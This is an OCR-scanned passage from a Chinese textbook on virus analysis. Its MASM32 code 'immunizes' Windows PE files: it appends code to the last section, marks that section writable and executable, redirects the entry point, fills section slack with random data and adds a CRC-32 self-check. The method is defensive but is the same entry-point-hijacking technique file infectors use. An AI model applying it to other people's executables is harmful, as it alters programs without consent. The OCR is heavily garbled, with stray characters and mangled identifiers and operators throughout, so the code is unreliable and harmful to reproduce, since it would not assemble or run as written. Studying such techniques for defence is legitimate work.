Af dos headere magic != SA4DH :判断 有 无 "MZ" 标 志 
szText szErrFile, "3E MZ 文件 " 
invoke SendMessage, hList, LB ADDSTRING, 0, addr szErrFile 
jmp Exit Analy 381 
„endif 
:移动 文件 指针 
invoke SetFilePointer,hFile,dos_header.e_lfanew,NULL.FILE BEGIN 
: 读 PE 3k 
invoke ReadFile, hFile, ADDR nt header, sizeof 
IMAGE NT HEADERS.ADDR hLen 2.NULL 
if nt headerSignature - 4550H 31 PE 标志 ，4550H 为 "PE" 标 志 
szText szErrFile2, "4E PE 文件 " 
invoke SendMessage.hList.LB_ADDSTRING.0.addr szErrFile2 
jmp Exit Analy 
endif 
:显示 头 文件 主要 参数 
szText head_1、".….. 头 文件 参数 如 下 .……" 
invoke SendMessage, hList, LB_ADDSTRING. 0, ADDR head 1 
szText head inf0. " 入 口 地 址 为 %xH" 
invoke wsprintf, ADDR info, ADDR head infü, 
nt header.OptionalHeader.AddressOfEntryPoint 
invoke SendMessage. hList. LB ADDSTRING. 0. ADDR info 


szText head infl," 程序 基 址 地 址 为 %xH" 


第 3 章 ， 病 毒 分 析 ০117৯ 


invoke wsprintf, ADDR info. ADDR head infl. 
nt header.OptionalHeader.ImageBase 
invoke SendMessage. hList LB ADDSTRING.0.ADDR info 
szText head in." 程序 校 验 和 为 %xH" 
invoke wsprintf, ADDR info.ADDR head inf2, 
nt header.OptionalHeader.CheckSum 
invoke SendMessage. hList LB ADDSTRING, 0. ADDR info 
:分 析 节 个 数 ， 遍 历 各 节 
szText eachSec, "…. 各 个 节 参 数 如 下 .…” 
invoke SendMessage. hList LB ADDSTRING. 0, ADDR eachSec 
mov eax, sizeof IMAGE SECTION HEADER 
Xor esi esi 
mov si, nt headerFileHeader.NumberOfSections : 节 个 数 
mul esi : 节 的 个 数 * 节 的 长 度 
mov hLen, eax  :eax 为 所 有 节 表 结构 的 长 度 
invoke GlobalAlloc, GPTR. hLen ”: 分 配 内 存 
mov psec, eax :指针 给 psec 
if eax— NULL :分 配 内 存 失败 ， 返 回 
szText MemoryErr. "内存 分 配 失败 " 
invoke SendMessage. hList, LB ADDSTRING. 0, ADDR MemoryErr 
invoke CloseHandle.hFile 
ret 
endif 
invoke RtlZeroMemory. psec, hLen 
: 读 所 有 节 表 结构 到 内 存 psec 
invoke ReadFile, hFile, psec. hLen, ADDR hLen, NULL 
mov ebx, psec 
mov ex, 0 :; 节 计数 
mov flagsl, 0 MERRE 
assume ebx: ptr IMAGE SECTION HEADER 
mov xtem, 0 
movzx eax, nt header.FileHeader.NumberOfSections 
:遍历 各 节 
‘While xtem < eax 
xor ecx, ecx 
mov ecx, xtem 
szText sec_inf0, " 第 %d 节 属 性 为 %xH" 
invoke wsprintf. ADDR info. ADDR sec infÜ, ecx, 
[ebx] IMAGE SECTION HEADER. Characteristics 
invoke SendMessage. hList. LB ADDSTRING.0. ADDR info 
xor ecx, ecx 
mov ecx, xtem 
szText sec inf). " 第 %d 节 文 件 偏 移 为 %xH. 内 存 偏 移 %xH" 
invoke wsprintf. ADDR info. ADDR sec inf9, ecx, 
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[ebx].IMAGE SECTION HEADER PointerToRawData. 
[ebx]. IMAGE SECTION HEADER. VirtualAddress 
invoke SendMessage, hList. LB ADDSTRING, 0. ADDR info 
mov eax, [ebx]. IMAGE SECTION HEADER. Misc.VirtualSize 
:判断 每 个 节 有 无 空白 区 ， 即 比较 VirtualSize 和 SizeOfRawData 
if eax = [ebx]IMAGE SECTION HEADER SizeOfRawData 
szText sec_infl,"#%d 节 无 空白 区 " 
invoke wsprintf, ADDR info, ADDR sec infl, ecx 
invoke SendMessage. hList, LB ADDSTRING, 0. ADDR info 
: 某 个 节 无 空白 
inc flags 
else :有 空白 区 
SZText sec inf2, "第 %d 节 实际 大 小 为 %xH. 占 用 %xHH, 空 白 区 %xH\ 
E 
mov edi, [ebx].IMAGE SECTION HEADER.SizeOfRawData 
mov esi [ebx|IMAGE SECTION HEADER .Misc.VirtualSize 
XOr eax, eax 
:必须 ， 后 面 不 能 用 xtem， 因 为 wsprintf 后 面 参数 必须 为 DWORD 类 \ 
:型 ， 否 则 导致 堆栈 不 正确 
mov eax, xtem 
mov hLen, edi 
sub  hLen esi 
invoke wsprintf, ADDR info, ADDR sec inf2, eax, esi, edi, hLen 
invoke SendMessage, hList, LB ADDSTRING, 0. ADDR info 
mov eax, [ebx].IMAGE SECTION HEADER.SizeOfRawData 
sub eax, [ebx]. IMAGE SECTION HEADER.Misc.VirtualSize 
„endif 
: 指 到 下 一 个 节 表 结构 
add ebx, sizeof IMAGE SECTION HEADER 
inc xtem 
movzx eax, nt_header.FileHeader.NumberOfSections 
.endw 
assume ebx:nothing 
Exit Analy: 
invoke GlobalFree, psec :释放 内 存 
invoke CloseHandle.hFile 。 :关闭 文件 
:第 一 步 : 添加 免疫 代码 
invoke ProcessFile, ADDR szFileName 
:第 二 步 和 第 三 步 : 节 表 间 插入 随机 数据 ， 节 表 下 移动 
szText forApp. "附加 代码 OK" 
invoke SendMessage. hList, LB ADDSTRING, 0. ADDR forApp 
invoke InsertRand 
szText forRand. "插入 随机 数 OK" 
invoke SendMessage.hList LB ADDSTRING. 0. ADDR  forRand 
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:第 四 步 : 计算 校 验 值 并 写 入 文件 
invoke GetFileCrc32. crc_file offsetl 0. ADDR szFileName 
ret 
AnalyzeFile endp 


(3) 添加 免疫 代码 
通过 在 上 面 的 AnalyzeFile 函数 中 调用 ProcessFile 实现 。ProcessFile 的 代码 如 下 : 


ProcessFile proc f Name: DWORD :f Name 为 文件 名 
local @hFile, @dwTemp . @dwEntry. @lpMemory, @hLen 
local ntHead: IMAGE NT HEADERS :PE 3k 
local secHeadIMAGE SECTION HEADER 
pushad 


কেককককককককসককককককককফকককককককককককককককককককককককককককককককককককক কক 


; 打开 文件 f Name， 得 到 文件 句柄 @hFile 
কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 

invoke  CreateFile, f Name, GENERIC READ or GENERIC WRITE, 
FILE SHARE READ or FILE SHARE WRITE, NULL, 
OPEN EXISTING.0.NULL 

if eax = INVALID HANDLE VALUE :打开 失败 

jmp Ret 
endif 
mov  @hFile, eax 


কেক কক ক কক কককক কক ফ ক কককক ককফক ক কক ক কককক কক কক কক কক. কক কফ কক কক কক কক কক কক ক কক 


; 取 文 件 大 小 ， 是 0 则 返回 


iolokookokokolololokokelolotolooloololoolaolololololotoloololololoololoololotokooloooloololololololokooe 


invoke GetFileSize, @hFile, ADDR @dwTemp 


mov @hLen, eax 
jf eax = 0 
jmp Retl 

endif 


কেকক সক সংসংক সক ক সক কংসক কক কক কলংক ক কককক ক কক ক কক কক ক. কক ক কক কংস ক কক ক কক কক কক ক কক কক 


: 分 配 内 存 ， 得 到 内 存 指针 @lpMemory 
চককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 

invoke — GlobalAlloc, GPTR. @hLen 

mov@lpMemory, eax 

movedi, eax 

if eax— NULL :分 配 内 存 失败 ， 返 回 

jmp Ret2 
endif 


কেকফককক কক কককককককককককক কককককককককককককককককককককককককককক কককককক ক কক কক 


: 读 文件 到 @lpMemory 


কেককককককককককককককককককককককক কককককককককককককককককককককককককককক ককককককক* 


invoke ReadFile, @hFile, @lpMemory, @hLen, addr @dwTemp, NULL 


কেককককককককককককককককককককককককককককককককককককককককককককককককককক ককককককক* 
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:因为 要 操作 它们 ， 而 寄存 器 不 够 用 
:备份 NT 3k, esi-NT 头 指针 ，edi=ntHead 变量 ，ecx=NT 头 大 小 ， 
:不 考虑 DS、ES 
d 

mov edx, (?lpMemory 

assume edx:ptr IMAGE DOS HEADER 

mov esi [edx]e lfanew 

add esi, edx :esi 指向 PE 3k 

push esi 

mov ecx, sizeof IMAGE NT HEADERS 

lea edi, ntHead :edi 为 备份 的 变量 地 址 

cld 

rep movsb 
কেসকককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
:备份 最 后 一 个 节 结 构 的 头 ,esi= 节 指针 ，edi=secHead 变量 ，ecx= 节 表 
KA, THE DS, ES 
কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 

pop esi 

assume edi: ptr IMAGE SECTION HEADER 

assume esi:ptr IMAGE NT HEADERS 

movzx eax, [esi] FileHeader.NumberOfSections 


dec eax 
mov ecx, sizeof IMAGE SECTION HEADER 
mul cx 


mov edx, @lpMemory — :乘法 已 经 改变 dx， 故 再 赋值 一 次 
add eax, [edx].e lfanew 
add eax, @lpMemory 
add eax, sizeof IMAGE NT HEADERS 
mov esi, eax :最 后 节 表 结构 指针 
push esi 
lea edi. secHead 
mov ecx, sizeof IMAGE SECTION HEADER 
cld 
rep movsb 
;edi 为 最 后 节 指针 ,esi 为 PE 3k 
pop edi 
mov esi (101১1510915 
mov edx, esi 
add esi, [edx]e lfanew 


oboooloeoloolokooloeoloololeloloololobooeololoboleobeloololooloooloololooloooloolooeeelele 


; 向 最 后 一 个 节 加 入 代码 ， 并 修正 一 些 PE 头 部 的 内 容 


কেককককককক কক কক কককককককককককক কককককককককককককককককককক কককককককক কককককক কক 


:竟然 发 现 某 些 时 候 编译 器 生成 的 文件 节 出 现 
:[edi]Misc.VirtualSize>[edi].SizeOfRawData， 避 免 后 面 出 错 ， 此 处 予以 
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:分 析 ， 修 正 
mov eax. [edi].SizeOfRawData 
Af eax < [edi] Misc.VirtualSize 
mov [edi] Misc.VirtualSize. eax 
.endif 
mov eax, offset APPEND CODE END -offset APPEND CODE 
add eax, [edi] Misc. VirtualSize 
:计算 最 后 节 在 加 入 免疫 代码 后 的 新 实际 长 度 
mov f[edi].Misc.VirtualSize, eax 
:计算 最 后 节 文件 对 齐 后 长 度 。_Align 函数 在 上 节 已 经 介绍 
invoke — Align, [edi].Misc.VirtualSize.[esi].OptionalHeader.FileAlignment 
mov  [edi|SizeOfRawData, eax :计算 节 内 存 对 齐 后 新 长 度 
:下 面 竟然 对 Masm32 下 程序 不 需 修改 ， 否 则 出 错 ( 对 VC++ 生 成 的 又 必须 ) 
if ntHead.OptionalHeader.AddressOfEntryPoint != 1000h 
:在 VC++ 下 入 口 地 址 一 般 不 为 401000H 
mov eax. offset APPEND CODE END-offset APPEND CODE 
add — [esi].OptionalHeader.SizeOfCode, eax :修正 代码 段 大 小 SizeOfCode 
add [esi].OptionalHeader.SizeOflmage, eax 
:修正 内 存 中 整个 PE 映像 体 的 尺寸 SizeOfImage 
.endif 
:修改 最 后 节 属性 
mov eax, [edi].Characteristics 
or eax, IMAGE SCN CNT CODE or MAGE SCN MEM EXECUTE 
or IMAGE SCN MEM READ or IMAGE SCN MEM WRITE 
;设置 新 节 的 属性 为 "代码 "+" 可 执行 "+" 可 读 "+" 可 写 " 
mov [edi].Characteristics, eax 
ককককককককককককককককককককককফককককককককককককককককককককককককফককককককককাককক 
: 求 校 验 值 文件 偏 移 crc_file_offsetl 0= 最 后 节 文 件 偏 移 + 该 节 实际 大 小 + 
; offset @crc_pos - offset APPEND CODE 
;为 何不 直接 保存 到 crc_file_offset， 因 为 它 在 代码 段 ， 是 只 能 读 不 能 写 
:在 函数 GetFileCrc32 中 将 crc_file_offsetl_0 写 入 到 新 文件 中 
:的 cre file offset 
j কককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov eax, [secHead].PointerToRawData 
add eax, [secHead].Misc.VirtualSize 
mov ecx, offset (rc pos -offset APPEND CODE 
add eax, ecx 
mov crc file offset] 0. eax 
QESEEETEEEEUEEEE EEUU HEEUEAEEE LEE E EE EEHEEEU E EE E | E EE AA 
; 修改 最 后 节 的 节 名 为 “. 赵 树 升 ”。 其 16 进 制 数 可 以 用 下 面 的 VC 
;代码 测试 。 为 d5.d4.ca.f7.c9.fd 
void CTestDlg::OnButtonl() 
t 
00819180171": 
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; CString in; 
; i0=(DWORD)s[0]&0xff: 
; il=(DWORD)s[1]&0xff: 
; i2=(DWORD)s[2]&0xff: 
; i3-(DWORDJs[3]&O0xff: 
i i4=(DWORD)s[4]&0xff- 
; iS-(DWORD)s[5]&Oxff: 
; in.Format("s[0]-?ex,s[1]-9ox.s[2]-9ox.s[3]-*ox.s[4]-?ox.s[5]-9 ox" 0.11. 
: 23, 54,55); 
AfxMessageBox(in): 
lea ecx, [edi].Namel 
Af byte ptr[ecx--1] 一 0d5h && byte ptr[ecx*2] 一 0d4h && byte ptr[ecx+3] 一 Ocah && byte 
ptr[ecx--4] = 0f7h && byte ptr[ecx--5] = 0c9h && byte ptr[ecx--6] = Ofdh 
jmp Re :着 已 经 加 过 免疫 代码 了 ， 就 算 了 
-endif 
mov byte ptr [ecx]. 
mov byte ptr [ecx+1], Od5h 
mov byte ptr [ecx42], 0d4h 
mov byte ptr [৩০43], Ocah 
mov byte ptr [ecx+4], 0f7h 
mov byte ptr [ecx+5], Oc9h 
mov byte ptr [ecx+6], Ofdh 
mov byte ptr [ecx47]. 0 
;invoke MessageBox, 0, ADDR [edi].Namel .ADDR szFileName, MB OK 


এককক কক সংসংকংস. কক কক কক কক কল সক সক কক ক ক কক কক কক ক কক ক কক কককক কক কক ককংক ক. কক কক কক কক ক 


; 修正 文件 入 口 指针 
চকেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov eax, [esi].OptionalHeader.AddressOfEntryPoint 
mov eax, [edi].VirtualAddress 
add eax, (offset NewEntry-offset APPEND CODE) 
add eax, secHead.Misc.VirtualSize ”: 还 要 加 原来 节 实际 长 度 
mov  [esi].OptionalHeader.AddressOfEntryPoint. eax :设置 新 的 入 口 地 址 
কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
: 写 原来 文件 ， 长 度 不 使 用 @hLen， 而 使 用 最 后 节 偏 移 + 节 大 小 。 
:因为 文件 后 面 可 能 附加 其 他 数据 ， 而 装载 器 不 检查 
কেককককককককককককককককককককককককককককককককককককককককককক কক কক ককককককককককক 
invoke  SetFilePointer, @hFile. 0, NULL. FILE BEGIN : 它 会 改变 edx、ecx 
mov ecx, secHead.PointerToRawData 
add ecx, secHead.Misc.VirtualSize 
invoke WriteFile, (2hFile. @IpMemory. ecx, addr (dwTemp. NULL 


কেককককককককককককককককককককককক কককককককককককককককককককককককককককক ককককককক* 
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; 添加 代码 
কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov ecx, offset APPEND CODE END-offset APPEND CODE 
invoke WriteFile, @hFile, offset APPEND CODE, ecx, addr @dwTemp. 
NULL 


কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 修正 新 加 代码 中 的 Jmp oldEntry 指令 


কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককফক 


mov eax, (offset _ToOldEntry - offset APPEND CODE-5) 
5 为 指令 jmp XXXX 长 度 
add eax, [edi].VirtualAddress 
add eax, secHead.Misc.VirtualSize 
mov ecx, ntHead.OptionalHeader.AddressOfEntryPoint 
sub ecx, eax 
mov  @dwEntry, ecx 
mov ecx, [edi].PointerToRawData 
add ecx, secHead.Misc.VirtualSize 
add ecx, (offset  ToOldEntry — offset APPEND CODE) 
inc ecx :竟然 必须 
; pushad :测试 用 
; SZText for], "vox, VX, %x.%x., AX" 
; invoke wsprintf, ADDR inf, ADDR forl, ntHead. 
; OptionalHeader.AddressOfEntryPoint, 
: [esi]. OptionalHeader.AddressOfEntryPoint 
; esi.[edi].PointerToRawData.edx 
; invoke MessageBox, 0, ADDR inf. 0, MB OK 
; popad 
invoke —SetFilePointer, @hFile, ecx, NULL, FILE BEGIN 
invoke — WriteFile, @hFile, addr (2dwEntry, 4, addr  (üdwTemp. NULL 
; 写 入 修复 程序 代码 
invoke SetFilePointer. @hFile. 0, NULL, FILE END 
mov ecx, offset MENDpro CODE END- offset MENDpro CODE 
invoke  WriteFile, @hFile, addr mend data, ecx, addr @dwTemp. NULL 
Reo: 
invoke GlobalFree.(?lpMemory 
_Retl: 
invoke CloseHandle,@hFile 
_Ret: 
assume esi: nothing 
popad 
ret 
ProcessFile endp 


(4) 修改 节 表 、 移 动 PE k 
修改 节 表 是 遍历 每 个 节 ， 让 每 个 节 中 的 节 大 小 描述 参数 相等 ， 即 让 节 实际 大 小 字段 
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VirtualSize 和 占用 磁盘 空间 字段 SizeOfRawData 相等 ， 同 时 在 空白 区 添 入 随机 数据 ， 以 其 
骗 病 毒 以 为 无 空间 可 以 利用 。 该 方法 可 防 CIH 之 类 的 病毒 。 移 动 PE 头 将 PE 头 移动 到 紧 
靠 第 一 节 的 开始 处 。 


InsertRand proc 

LOCAL @hFile, @hMapFile, @lpMemory, @dwFileSize 

LOCAL pol:DWORD, po2:DWORD. po3:DWORD, po4:DWORD 

LOCAL teml:DWORD, tem2:DWORD 

LOCAL secNum: DWORD 78114 

LOCAL info[256]: BYTE 

invoke — CreateFile, addr szFileName, GENERIC READ or 
GENERIC WRITE, FILE SHARE READor FILE SHARE WRITE, 
NULL, OPEN EXISTING, FILE ATTRIBUTE ARCHIVE, NULL 
Mov @hFile, eax 

if @hFile = INVALID HANDLE VALUE 

ret 

„endif 
invoke GetFileSize, @hFile, NULL — : 取 文 件 长 度 
mov ৫0৫৬5115512, eax 


if @dwFileSize = 0 :长 度 为 0 
invoke CloseHandle, @hFile 
ret 

„endif 


invoke GlobalAlloc, GPTR, @dwFileSize 
mov @lpMemory, eax 
Jf eax = NULL 
szText MemoryErrl, "内 存 分 配 失败 " 
invoke MessageBox, 0, addr MemoryErr1. NULL, MB OK 
invoke CloseHandle, (ihFile 
ret 
endif 
invoke RtlZeroMemory, @lpMemory, @dwFileSize 
invoke ReadFile, @hFile, @lpMemory, @dwFileSize, ADDR pol, NULL 
কেকফকককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov esi, @lpMemory 
mov edi, esi 
mov ebx, esi 
assume edi: ptr IMAGE DOS HEADER 
assume esi: pr. IMAGE NT HEADERS 
assume ebx: ptr IMAGE SECTION HEADER 
;edi 指向 DOS k, esi 指向 PE 3k, ebx 指向 节 表 
add esi, [edi].e_Ifanew 
add ebx, [edi] lfanew 
add ebx. sizeof IMAGE NT HEADERS 
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mov secNum, 0 
xor ax, eax 
mov ax, [esi].FileHeader.NumberOfSections 
:循环 处 理 每 个 节 
-While secNum < eax 
mov ecx, [ebx] Misc.VirtualSize :实际 空间 
mov pol. ecx 
mov ecx, [ebx].SizeOfRawData :占用 空间 
:竟然 需要 ， 偶 然 发 现 个 别 程序 的 “Misc.VirtualSize > SizeOfRawData, 
:真是 奇怪 ， 可 能 是 编译 器 有 问题 ? 
jf ecx> pol 
sub ecx, pol 
mov po4, ecx :填写 的 空间 大 小 为 SizeOfRawData-Misc.VirtualSize 
mov ecx, [ebx] PointerToRawData :文件 中 偏 移 地 址 
add ecx. [ebx].Misc.VirtualSize 
add ecx, @lpMemory 
mov pol, ecx :该 节 在 内 存 开始 填写 随机 数据 的 位 置 
.While 0০4৯০ 
invoke nrandom, 255 :产生 随机 数 ，255 为 范围 
mov edx, pol 
mov [edx] al :加 入 随机 数 低 8 位 
inc pol 
dec po4 
.endw 
szText forml 1, "第 %X 节 插入 随机 数据 成 功 " 
invoke wsprintf, ADDR info, ADDR forml 1, secNum 
invoke SendMessage, hList, LB ADDSTRING,0, ADDR info 
else 
szText 9070] 2. "第 %X 节 插入 随机 数据 失败 " 
invoke wsprintf, ADDR info, ADDR forml_2, secNum 
invoke SendMessage, hList, LB_ADDSTRING, 0, ADDR info 
„endif 
mov eax, [ebx]SizeOfRawData 
mov [ebx].Misc.VirtualSize, eax 
add ebx, sizeof IMAGE SECTION HEADER :指向 下 个 节 
inc secNum 
movzx eax, [esi].FileHeader.NumberOfSections 
dec eax 
:最 后 一 个 节 不 在 此 时 插入 随机 代码 ， 因 为 后 面 有 mend.exe 附加 在 后 面 
.endw 
xor eax, eax 
mov ax. [esi].FileHeader.NumberOfSections 
; szText form12,"po1=%X , 96x , %x. %X" 
; invoke wsprintf. ADDR info, ADDR form12_po1. 


us 
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; [ebx] Misc.VirtualSize.secNum.eax 

; invoke MessageBox.0.ADDR info.NULL.MB OK 

mov eax, [edi]e lfanew 

mov teml, eax 

চ ককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
; 实现 将 PE 头 移动 到 靠近 第 一 个 节 的 开始 处 

mov esi, @lpMemory 

mov edi, esi 

mov ebx, esi 

; edi 指向 DOS 头 ，esi 指向 PE 3k, ebx 指向 节 表 : 

add esi, [edi|e Ifanew 

add ebx, [edi]e lfanew 

add ebx, sizeof IMAGE NT HEADERS 

mov eax, [ebx]PointerToRawData : 取 第 一 节 的 文件 偏 移 
mov pol, eax 

mov eax, [edi]. lfanew HX PE 头 的 开始 位 置 
mov po2, eax 
mov ecx, eax 
add ecx， sizeof IMAGE NT HEADERS 
xor eax, eax 
mov ax, [esi].FileHeader.NumberOfSections 
mov edx, sizeof IMAGE SECTION HEADER 
mul dx :计算 节 表 结 构 占 用 字 节 数 


mov tem2, eax 
; eax 为 节 表 结构 与 PE 头 占 用 总 字 节 数 +[edi].e_lfanew 
add eax, ecX 
; 比较 文件 头 是 否 需要 移动 
mov po4, eax 
if eax < pol 
mov ecx, pol 
sub ecx, eax :计算 移动 距离 ， 为 第 一 节 文件 偏 移 
; PointerToRawData- 节 表 结 构 与 PE 头 占用 总 字 节 数 +[edi].e_lfanew 
push ecx :移动 距离 保存 
mov esi, teml :teml 为 [edi].e_lfanew， 此 时 edi 已 变化 
add esi, @lpMemory ” :加 内 存 偏 移 为 源 起 始 地 址 
mov edi. esi 
add edi. ecx :加 次 数目 的 起 始 地 址 
mov ecx, sizeof IMAGE NT HEADERS 
add ecx, tem2 :移动 次 数 
mov bx, ds 
mov es, bx 
cld 
rep movsb 


pop ecx : 清 0 的 次 数 
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push ecx 
mov esi @lpMemory 
add esi, teml সা 0 的 开始 位 置 
mov al 0 
; 将 移动 的 原 e_lfanew 开始 处 清 0 
caGain: 
mov [esi] al 
inc esi 
loop caGain 
;设置 新 的 e_lfanew 
pop ecx 
mov edi, @lpMemory 
mov eax, teml 
add eax, ecx 
mov [edil.e lfanew, eax 
szText form2 1, "PE 头 移动 成 功 !" 
invoke SendMessage, hList, LB ADDSTRING, 0. ADDR form2 1 
else 
szText form2 2,"PE 头 不 需要 移动 
invoke SendMessage.hList.LB_ADDSTRING.0.ADDR form2 2 
„endif 
er_exit: 
assume edi: nothing 
assume esi: nothing 
assume ebx: nothing 
invoke SetFilePointer, @hFile, 0, NULL.FILE BEGIN 
invoke WriteFile, @hFile, (?lpMemory, (2dwFileSize, ADDR po3, NULL 
. ErrorExit: 
invoke GlobalFree, (2lpMemory 
invoke CloseHandle, @hFile 
ret 
InsertRand endp 


(5) 计算 校 验 值 

前 面 的 步骤 完成 后 ， 要 计算 其 校 验 值 存 入 文件 的 某 个 位 置 ， 供 程序 启动 时 比较 用 。 
Windows 的 PE 文件 中 有 一 个 字段 是 文件 的 校 验 值 ， 但 该 值 的 位 置 是 固定 的 ， 而 这 里 存放 
校 验 值 的 位 置 因 文件 的 长 度 不 同 而 不 同 。 

循环 兄 余 码 CRC 检验 技术 广泛 应 用 于 测控 及 通信 领域 ， 它 是 利用 除法 及 余数 的 原理 
来 作 错误 侦 测 。CRC 校 验 的 基本 思想 是 利用 线性 编码 理论 ， 在 发 送 端 根据 要 传送 的 k 位 二 
进 制 码 序列 ， 以 一 定 的 规则 产生 一 个 校 验 用 的 监督 码 ( 即 CRC 码 )r 位 ， 并 附 在 信息 后 边 ， 
构成 一 个 新 的 二 进 制 码 序 列 数 共 (krD 位 ， 最 后 发 送出 去 。 在 接收 端 ， 则 根据 信息 码 和 CRC 
码 之 间 所 遵循 的 规则 进行 检验 ， 以 确定 传送 中 是 否 出 错 。16 位 的 CRC 码 产生 的 规则 是 先 
将 要 发 送 的 二 进 制 序列 数 左 移 16 位 后 ， 再 除 以 一 个 多 项 式 ， 最 后 所 得 到 的 余数 即 是 CRC 
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码 ， 而 CRC-32 则 产生 的 是 32 位 的 CRC 码 。 
函数 GetFileCrc32 先 将 文件 读 入 内 存 , 然后 将 内 存 偏 移 地 址 crc_offsetl+4 后 面 的 字 节 前 移 
4 字 节 ， 然 后 计算 文件 长 度 - 4 字 节 个 字 节 的 CRC 32 值 。 结 果 存 放 于 文件 偏 移 crc offsetl 处 。 


কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 先 将 偏 移 值 crc_offsetl 写 入 文件 ， 然 后 将 除 该 偏 移 值 处 4 字 节 不 参加 校 验 
; 函数 功能 ， 计算 CRC-32 到 eax 
: 入 口 参数 为 crc_offsetl 为 文件 中 有 4 个 字 节 不 参与 校 验 ， 它 在 文件 中 偏 移 
: 入 口 参数 fName 为 文件 名 指针 
কেসকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
GetFileCrc32 proc crc offset: DWORD, fName: DWORD 
Local crc32tbl[256]: DWORD 
Local file name[256]: byte 
Local handle f: DWORD 
Local len 1: DWORD 
local crc lenl: DWORD 
Local pData: DWORD 
Local @templ: DWORD 
Local new cr: DWORD  :CRC32 新 校 验 值 
pushad 
:动态 生成 CRC-32 表 到 crc32tbl 
mov ecx. 256 
$BigLoop: 
lea eax, [ecx-1] 
push ecx 
mov ecx, 8 
$SmallLoop: 
shr eax, 1 
jnc @F 
xor eax, OEDB88320h 
@@: 
dececx 
jne $SmallLoop 
pop ecx 
mov  [crc32tbl*ecx*4-4], eax 
dec ecx 
jne $BigLoop 
invoke  CreateFile, fName, GENERIC READ or GENERIC WRITE, 
FILE SHARE READor FILE SHARE WRITE, NULL, 
OPEN EXISTING, FILE ATTRIBUTE ARCHIVE.NULL 
mov handle f, eax 
if  eax— INVALID HANDLE VALUE 
szText 作 ailed." 打 开 文 件 读 写 失败 " 
invoke MessageBox, 0. fName. ADDR fFailed. MB OK. 
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jmp $Done 
„endif 
invoke GetFileSize, handle f. ADDR crc lenl 
mov len 1, eax 
mov eax, crc offsetl 
add esx, 4 
mov @templ, eax 
;SzText newPos, "%X, %X, %X" 
; invoke wsprintf, ADDR file name, ADDR newPos, len_1, @temp1, 
:crc offsetl 
; invoke MessageBox.0,ADDR file name,.NULL.MB OK 
কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
; 写 入 校 验 值 在 文件 中 偏 移 
; 必须 在 校 验 前 写 入 
ফেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
invoke SetFilePointer, handle f, @temp1, NULL, FILE BEGIN 
invoke WriteFile, handle f, ADDR crc offsetl, 4, ADDR @templ, NULL 
invoke SetFilePointer, handle f. 0, NULL, FILE BEGIN 
invoke GlobalAlloc, GPTR, len 1 
mov pData, eax 
Af eax— NULL 
szText memErr," 分 配 内 存 失败 " 
invoke MessageBox.0, ADDR file name, ADDR memErr, MB OK 
jmp $Done 
endif 
invoke ReadFile, handle f. pData, len 1, ADDR @templ, NULL 
:忽略 放 校 验 值 的 4 个 字 节 位 置 ， 往 前 移动 4 个 字 节 数据 
:( 放 校 验 值 位 置 不 参加 校 验 ) 
mov edi, pData 
add edi, crc offsetl 
mov esi, edi 
add esi, 4 
mov ecx, len] 
sub ecx. crc offsetl 
sub ecx, 4 
cld 
rep movsb 
: 设置 校 验 参数 
: 计算 CRC-32， 采 用 的 是 把 整个 字符 串 当 作 一 个 数组 ， 然 后 把 这 个 数 
: 组 的 首 地 址 赋值 给 EBX， 
: 把 数组 的 长 度 赋值 给 ECX， 然 后 循环 计算 ， 返 回 值 (计算 出 来 的 
: CRC-32 值 ) 储 存在 EAX 中 : 
: EBX = 校 验 数据 首 地 址 
: ECX = 参与 校 验 的 字 节 数 
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mov ecx, len 1 

sub ecx, 4 

mov ebx, pData 

mov eax, -1; 先 初始 化 eax 

Or ecx, ecx 

jz $Done :如 果 表 为 空 ， 就 bye bye 

orebx, ebx 

jz $Done; 避免 出 现 空 指针 
@@: 

mov dl [ebx] 

xor dl, al 

movzx edx, dl 


shr eax, 8 

xor eax, [crc32tbleedx*4] 
inc ebx 

dec ecx 

jne @B 

not eax 

$Done: 


mov new cr, eax :保存 校 验 值 

invoke SetFilePointer, handle fcrc offsetl, NULL, FILE BEGIN 
invoke WriteFile, handle f. ADDR new crc, 4, ADDR 
(Qtempl, NULL : 写 入 校 验 值 

invoke GlobalFree, pData 

invoke CloseHandle, handle f 

szText forms, "9oX" 

invoke wsprintf, ADDR file name, ADDR forms, new crc 
invoke SetWindowText, hEditl, ADDR file name 

invoke wsprintf, ADDR file name, ADDR forms, crc offsetl 
invoke SetWindowText, hEdit2, ADDR file name 

popad 

ret 
GetFileCrc32  endp 


(6) 免疫 代码 分 析 

免疫 代码 首先 获取 需要 用 到 的 所 有 API 函数 的 地 址 ， 然 后 读 文件 本 身 ， 计 算 除 存放 校 
验 值 4 字 节 以 外 的 文件 的 校 验 值 。 若 校 验 值 有 变 ， 则 生成 修复 文件 mend.exe 并 执行 ， 退 出 
本 程序 退出 。 若 校 验 值 不 变 ， 跳 转 到 原来 程序 入 口 处 开始 执行 。 代 码 如 下 ， 部 分 代码 的 解 
TES IL. 


: 附加 代码 的 开始 位 置 
APPEND CODEequ this byte 
szFlags db ' 赵 树 升 Made.0 :标志 


hDIIKemel32 dd ? 
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10011050132 dd ? 

hDIIShell32 dd ? 

 GetProcAddress ApiGetProcAddress ? 

. LoadLibrary . ApiLoadLibrary ? 

_ MessageBox _ApiMessageBox ? 

szLoadLibrary db 'LoadLibraryA', 0 

szGetProcAddress db'GetProcAddress'. 0 

SZUser32 db 'user32' 0 

szKernel32 db 'kernel32.dll. 0 

szShell32 db 'shell32 dll. 0 

szMessageBox db 'MessageBoxA', 0 

(Qcrc pos equ $ :保存 CRC22 值 的 位 置 

cr old dd "1234" :文件 前 部 加 后 部 的 校 验 值 

crc file offset dd — 61626364h 

; 修复 程序 3072 字 节 

